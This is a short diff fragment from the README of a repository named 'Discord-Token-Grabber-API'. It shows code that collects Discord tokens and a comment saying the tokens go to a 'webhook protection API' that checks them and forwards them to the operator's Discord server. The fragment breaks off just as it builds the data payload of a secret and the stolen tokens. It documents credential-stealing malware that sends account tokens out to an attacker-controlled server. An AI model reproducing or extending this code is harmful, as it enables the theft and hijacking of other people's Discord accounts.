ALEHACKsp/Discord-Token-Grabber-API/README.md

                 tokens.append(token)

-# send tokens to the webhook protection API
+# send tokens to the webhook protection API that will validate them and send them to your Discord server over webhook
 try:
     data = {'secret': SECRET, 'tokens': tokens}